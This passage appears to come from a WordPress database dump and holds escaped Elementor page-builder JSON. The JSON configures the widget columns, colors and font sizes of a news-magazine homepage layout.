\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_border_border\":\"dotted\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1346,473,'_elementor_version','0.4'),(1347,474,'_elementor_edit_mode','builder'),(1348,474,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\